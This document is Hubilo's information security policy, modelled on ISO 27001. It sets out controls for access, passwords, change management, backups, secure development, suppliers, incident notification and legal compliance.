1
The confidentiality, integrity, and availability of information, in all its forms are critical to the on-going functioning and good governance of Hubilo. Failure to adequately secure information increases the risk of financial and reputational losses from which it may be difficult for Hubilo to recover.
Information security policy outlines Hubilo’s approach to information security management. It provides the guiding principles and responsibilities necessary to safeguard the security of the Hubilo’s information system and protect client’s data.
2
The purpose of this policy is to provide management guidelines for information security and to maintain appropriate information security controls at Hubilo to protect customer data.
3
This policy is applicable to all the employees, departments and projects using client’s and Hubilo facilities and equipment.
4
Hubilo is committed to complying with all applicable regulations and law of the land in all locations and countries related to its operations and information processing.
The key regulation that is complied with includes laws related to corporate governance, employee relations, data privacy, intellectual property, and financial reporting.
5
Our Information Security Goals are listed below:
• Protection of Client information.
• Protection of information assets belonging to the
• To provide confidence to the Clients where information needs to be shared/stored.
These policy objectives are achieved through the implementation of our Information Security Management System, which includes security standards, procedures and guidelines developed in accordance with ISO/IEC 27001:2013.
6
ISMS scope and boundaries of ISMS is defined considering the business, contractual requirements, and legal obligations. Any exclusion from the ISMS scope is justified and documented. Security policies and procedures are developed/ updated/ modified by Hubilo to address selected controls and for their implementation.
Compliance and security team is formed to implement, operate, and maintain the ISMS at Hubilo. Compliance and security leader is responsible for implementing, operating, and maintaining the ISMS at Hubilo. Suitable measures for effectiveness of controls or groups of controls are established for their evaluations.
Effectiveness of the ISMS is measured from the inputs of regular internal audits, security audits, incidents, control effectiveness measurements, suggestions, and feedback from all interested parties.
Hubilo ensures that employees are aware of the information security policies and guidelines and contribute towards effectiveness of information security.
Hubilo communicates the current information security management system, the information security policies, and procedures to its employees and all the relevant stakeholders.
7
Hubilo has established a formal mobile computing policy which outlines security requirements for mobile devices.
Due care is taken when using mobile computing devices in public facilities, meeting rooms and other unprotected areas outside an organization’s premises to minimize possibilities of theft.
Remote access to business information across public networks using a laptop only takes place after successful identification and strong authentication.
All users using mobile computing devices such as laptops, tablets and smartphones for business purposes are trained on the security best practices towards these devices.
8
Hubilo has established a formal human resource security policy which outlines security requirements during employment and termination.
The Human Resources (HR) team at Hubilo addresses information security during recruitment, employment and after termination or change of employment for all Hubilo employees, contract employees and third-party employees.
All Hubilo employees who shall have access to information in any form within the Hubilo and client environment are subject to background verification prior to being hired in accordance with applicable laws and regulations. The Human Resources department is responsible for executing all background checks. All information gathered during the background check is handled and protected in accordance with the applicable laws and regulations.
When contractors or third parties are being engaged and shall access confidential customer information, the HR ensures requirements for conducting background verifications for the applicable contractor/ third party personnel are included in the contract or compensating controls are included in the contract.
Information security responsibilities are communicated to all employees and contractors during the hiring/ contracting process by the HR manager. All employees and contractor agreements include the employee/ contractor’s and Hubilo’s responsibilities for information security, including the handling of information assets, handling of information received from clients, and the consequences of violating the information security policy.
Hubilo ensures that all employees and contractors follow information security in accordance with Hubilo’s information security policy.
All employees (full-time and part-time), and where relevant, contractors and third-party staff, receive appropriate awareness training in information security and regular updates of organizational policies and procedures relevant to their job functions.
Any information security incident or deviation from the defined information security practices is investigated and appropriate disciplinary action is taken by Hubilo.
Hubilo ensures that all the employees or contractors are aware of the confidentiality/ non-disclosure agreement (if applicable) and relevant aspects of the employee or contractor agreement that apply upon termination from Hubilo or transferring positions within Hubilo to protect customer information from disclosure.
9
Hubilo has established a formal asset management policy which outlines security requirements related to Hubilo’s assets.
Hubilo identifies the assets registered and associated with creation, deletion, storage, transmission, and destruction of information and an inventory of these assets is maintained. Hubilo’s Asset types comprises informational assets, physical assets, software assets, people assets, services assets, etc.
Inventory of assets is maintained, and the asset owner is held responsible for classification of assets and reviewing the same. A delegated Risk Custodian may also be defined by the Asset Owner.
Hubilo identifies, document, implement and maintain the guidelines for acceptable use of assets and information of assets which ensures the following:
Employees follow the guidelines for the acceptable level of use of all the assets. Assets are only used for business and operational purposes and are protected from unauthorized usage. Formal procedures are defined for handling and storage of information assets based on their classification. Guidelines are defined to protect the information asset from unauthorized disclosure or misuse. Hubilo classifies information in terms of legal/ contractual/ regulatory requirements and value/ criticality to business operations with respect to confidentiality, integrity, and availability. Assets are classified based on the sensitivity of the information it supports.
Procedures to dispose of media containing sensitive data/information securely when it is no longer required is developed and implemented at Hubilo.
10
Hubilo has defined and documented access control rights and rules for users for user registration in the access control policy. User and group file access rights are configured per business requirements and on the “need to know” basis. There is segregation of roles for granting access rights to the individual.
Hubilo provides access to information in a manner that aims to protect the confidentiality and integrity of that information and without compromise to associated information or raw data.
The employees are given access according to their role. The following considerations is considered to identify the level of access to provisioned:
• The access is given according to the role of the employee, employee’s job responsibility with respect to the asset assigned to the employee.
• Security requirements of business applications and systems such as authentication password.
• Segregation of access controls roles, consistency between access rights and information classification.
• Legal obligations are mentioned in case the access rights are violated; limitation of access to data or services is mentioned and tracked.
• Periodic review of access rights is conducted quarterly, where changes or removal of access rights is mentioned.
• As per organization’s requirement the privileges access rights are assigned on a need-to-know basis such that access is given to only one person at a time.
• As per the organization’s requirement and roles assigned to different teams, the teams shall have different test environments and if the teams have access to the same test environment then the access is revoked once the purpose of each team is fulfilled (test environment is password protected).
• Access control policy shall provide the detailed guidelines on user access management. A formal user registration and de-registration process is implemented to enable the access rights by Hubilo. Unique user ID is maintained and the same is disabled upon transfer or termination of employees.
A formal user access provisioning process is implemented by Hubilo to assign or revoke access rights for all the employees having access to services or systems. Management of privileged access rights
• Hubilo shall ensure the allocation and use of privileged access rights are restricted.
• Privileged access rights are allocated to users on a need-to-know basis.
• An authorization process and a record of all privileges allocated is maintained.
• Privileged access rights shall not be granted until the authorization process is complete.
• Requirements for expiry of privileged access rights is defined.
• For generic administration user IDs, the confidentiality of secret authentication information is maintained when shared.
• Hubilo provides restricted access to its application systems and information contained within the application system. Logical access to software and information is limited to authorized users.
Password Management: We have processes designed to enforce minimum password requirements for Hubilo Service. We currently enforce the following requirements and security standards for end user passwords on Hubilo Service:
• Passwords must be a minimum of 8 characters in length and include a mix of uppercase and lowercase letters as well as numbers and symbols.
• Multiple sign-ins with the wrong username or password will result in a locked account, which will be disabled for a period to help prevent a brute-force sign-in, but not long enough to prevent legitimate users from being unable to use the application.
• Email-based password reset links are sent only to a user’s pre-registered email address with a temporary link. Hubilo prevents reuse of recently used passwords.
11
Our data centres are hosted in some of the most secure facilities available today in locations and use industry best practices that are protected from physical and logical attacks as well as from natural disasters, such as earthquakes, fires, and floods. We rely on third-party attestations of their physical security. Within our office premises, we employ several best industry-standard physical security controls.
12
Hubilo ensures that operating procedures are documented and are available to all employees. While documenting operating procedures, segregation of duties is considered. Operating procedures are made available centrally to all employees who need them to perform their job function.
Change Management: Hubilo ensures that changes to the information processing facilities, business process and systems that affect information security are controlled. The following items are included in the change management procedure:
• Identification and recording of significant changes.
• Planning and testing of changes
• Assessment of the potential impacts, including information security impacts, of such changes.
• Formal authorization and approval for proposed changes
• Verification that information security requirements have been met.
• Communication of change details to all relevant persons
• Fall-back procedures, including procedures and responsibilities for aborting and recovering from unsuccessful changes and unforeseen events.
Capacity Management: Hubilo monitors and tunes the use of resources and identifies capacity requirements to ensure the required system performance. System/ application/ network administrators monitor the capacity utilization, detect, and resolve problems timely, and project future capacity requirements to ensure that adequate processing infrastructure is available to meet business needs.
Separation of development, testing and operational environments: Development, testing, and operational environments are segregated at Hubilo to reduce the risks of unauthorized access or changes to the operational environment. The production environment is logically and physically separated from the development and test environments. The confidentiality of any production data used within the development and test environments (when applicable) is protected.
Protection from malware: To prevent exploitation by malicious code, Hubilo provides awareness training to all employees to make them aware of threats of installing unauthorized software on the computers. It is ensured that the anti-virus software is running the latest virus signatures and appropriate business continuity plans are drafted to ensure timely recovery of all IT systems due to a malicious code attack.
Backup: The employees are required to store company data on software such as SharePoint, project-specific drives, or source code version control system only. Backup of all mission critical servers is performed at regular intervals. Hubilo ensures that backup copies of information, software and system images are taken and tested regularly in accordance with an agreed backup policy.
Logging and Monitoring: Audit logs of critical servers are monitored with proper reporting in case of any accidental or intentional deletion or modification. Hubilo ensures that logging facilities and log information is protected against tampering and unauthorized access and System administrator and system operator activities are logged, and the logs protected and regularly reviewed.
Technical Vulnerabilities Management: Hubilo ensures that information about technical vulnerabilities of information systems is obtained in a timely fashion, the exposure to such vulnerabilities is evaluated and appropriate measures are taken to address the associated risk.
Hubilo identifies the associated risks and the actions to be taken once potential technical vulnerability identified, such action involves patching of vulnerable systems or applying other controls. Patches are tested and evaluated before they are installed to help ensure they are effective and do not result in side effects that cannot be tolerated; if no patch is available, other controls are considered. The technical vulnerability management process is regularly monitored and evaluated to help ensure its effectiveness and efficiency.
13
Network security management: Networks are managed and controlled to protect information in systems and applications. Controls are implemented by Hubilo to maintain the confidentiality and integrity of data passing over the public networks such as the internet or over wireless networks.
Hubilo ensures that technology controls are implemented while taking security / network services from a service provider. The controls consider the confidentiality, integrity and availability of the data being transmitted between the client and the service provider, Hubilo regularly monitors the services provided by the service provider. Corrective and preventive actions are taken to ensure that the service provider provides services as agreed to in the contracts.
Information transfer policies: Hubilo has defined formal transfer policies, procedures, and controls to protect the transfer of information and the use of all types of communication facilities. Company data sent over communications channels such as the internet are adequately protected from interception.
Electronic Messaging: Information involved in electronic messaging is protected. Information security considerations for electronic messaging includes the following:
• Email accounts are used for only business purposes
• Public service usage requires a prior approval.
Hubilo Product is always connected to the web-app via HTTPS using Secure Sockets Layer (SSL), a cryptographic protocol that is designed to protect against eavesdropping, tampering, and message forgery.
14
Hubilo has established a Software Development Lifecycle adopted for planning, requirement analysis, design, development, testing and maintenance of the product. There are controls which in place to achieve the information security and data protection requirements as follow:
Product Security: Hubilo ensures that security and privacy requirements are identified and documented for new product development, new information systems, or enhancement to the existing information. Following security controls are in place for Hubilo product:
• Hubilo services are secured using SSL certificates along with proper authentication mechanisms.
• Anonymous authentication is disabled.
• Access to the database is restricted and monitored.
• Security logs are monitored and backed up regularly.
• Periodic VAPT is performed on public facing services and all identified loopholes are mitigated.
• Security tools such as web application firewalls are used to protect against malicious attacks.
Code Security: Hubilo ensures that a secure development environment is established for the project. Depending on the coding environment, languages, databases, tools, and other components selected the appropriate guidelines for secure coding and configuration are adopted. The guidelines are evaluated to ensure they will provide adequate protection from the various type of potential attack identified in the risk assessment, such as:
• Cross Site Scripting
• Data Validation
• Poor error handling
• Malformed input
• SQL injection
Hubilo ensures that there is separation of development, test, and production environment wherever possible. Access control to development, test and production servers is made via a formal approval process as is provided on need-to-know and least privilege principle
System Security Testing: Thorough testing and verification of any new and updated systems and independent acceptance testing is performed to ensure that the system works as expected.
15
Hubilo provides essential services and business functions which rely on IT solutions and applications contracted by third-party suppliers, which may be primary or subcontractors.
Hubilo has established a formal Third-Party Supplier policy and put in place a procurement process so that contracts and dealings between Hubilo and third-party suppliers have acceptable levels of data protection and information security in place to protect information (such as personal & company data) and maintain the confidentiality, availability, and integrity of information and are fit for purpose. Information security and controls should be formally documented in a contractual agreement which may be part of or an addendum to the main commercial service contract.
Following controls are implemented for supplier management:
• Formal process for purchase requisition, vendor selection and purchase order is defined and implemented at Hubilo.
• Appropriate due diligence is exercised in the selection and approval of new suppliers before the contract is agreed.
• NDA is signed if the supplier is accessing
• Hubilo’s sensitive data.
• Third party service delivery agreement includes service definitions, security controls & arrangements and delivery levels. The service level agreement / contract is vetted by the Legal representative.
• Hubilo ensures that the supplier complies with all applicable data protection regulation, best practice standards.
• Third party service delivery is continuously monitored and reviewed by Hubilo’s
• Supplier access to Hubilo’s information resources is granted solely for the work contracted and for no other purpose.
• All Hubilo contracts clearly defines each party’s data protection and information security responsibilities toward the other by detailing the parties to the contract, effective date, functions, or services being provided (such as defined service levels), liabilities, limitations on use of subcontractors and other commercial/legal matters normal to any contract.
The processing is governed by a contract in writing between the controller and the processor, setting out the following:
• Subject matter and duration of the processing.
• Nature and purpose of the processing.
• Type of personal data and categories of data subjects involved.
• Obligations and rights of the controller and processor.
16
Hubilo ensures that all users are aware of the incident reporting and handling procedures. All information security incidents and weaknesses are identified, recorded, analysed, and classified based on the sensitivity. Hubilo ensures that the incident management team is trained on suitably categorizing the reported incident and subsequent action.
Hubilo has a Security Incident Management Policy designed to promptly and systematically respond to security, privacy, and availability incidents that may arise. The incident policy is tested and refined on a regular basis.
Notice: Hubilo agrees to provide a prompt written notice within the time frame required under Applicable Data Protection Law(s) to a customer’s Designated POC if it knows or suspects that a security incident has taken place. Such notice will include all available details required under Applicable Data Protection Law(s) for the customer to comply with its own notification obligations to regulatory authorities or individuals affected by the security incident.
17
Hubilo has established a formal business continuity and disaster recovery plan which is in line with the information security incident management policy. A business continuity plan developed states the conditions for activation and personnel responsible for execution of each component of the plan. It is ensured that BCP/DR plans are tested periodically to ensure that they are effective and up to date.
Hubilo has identified the business requirements for the availability of information systems. Redundant facilities or components are identified to guarantee the availability. Redundant facilities or components are tested to check its functionality to ensure that failover from one component or facilities to another works as intended.
18
Hubilo has established a formal Compliance Policy which addresses aspects of compliance required to be adhered to and fulfilled with respect to Hubilo’s Information Security Policies.
Hubilo addresses the legal and compliance requirements pertaining to relevant statutory legislation, and contractual and regulatory obligations which Hubilo is supposed to adhere to protect its documents, records, and assets, thereby preventing the misuse of information processing facilities.
Hubilo has identified the controls to be implemented to comply with the required regulations and legal requirements.
Intellectual Property Rights: Hubilo ensures that all software used in the organization is licensed and procured from reputable vendors. No user must download or install any third-party unauthorized software on Hubilo’s systems. Regular review is conducted to ensure that only authorized software and licensed products are installed in the Hubilo’s systems.
Protection of Records: Hubilo has identified and documented all records that need to be maintained to meet statutory, regulatory, contractual, and business requirements. It is ensured that appropriate protection measures are taken to protect the Confidentiality, Integrity and Availability of the records. Data or records that are no longer required for business, legal, and/or regulatory purposes will be disposed of securely.
Relevant statutory, regulatory, and contractual requirements for Hubilo ’s information assets will be defined explicitly. Such requirements will include, but are not limited to:
• Information Technology Laws (IT Act-2000)
• Software Licensing Requirements
• Intellectual Property Rights (IPR) Laws
• Labor and General Employment Laws
• Indian Company Act 2013
• Income Tax Act 1961
• As part of the information security audits by independent consultants or bodies, the appropriate confidentiality and non-disclosure agreements will be signed with them. And any access granted to the external shall be restricted immediately after completion of the audit.
Compliance requirements are used to enforce a minimum level of security and privacy within Hubilo.
Any Hubilo member found to have violated this policy may be subject to disciplinary and/or legal action according to the Disciplinary policy.
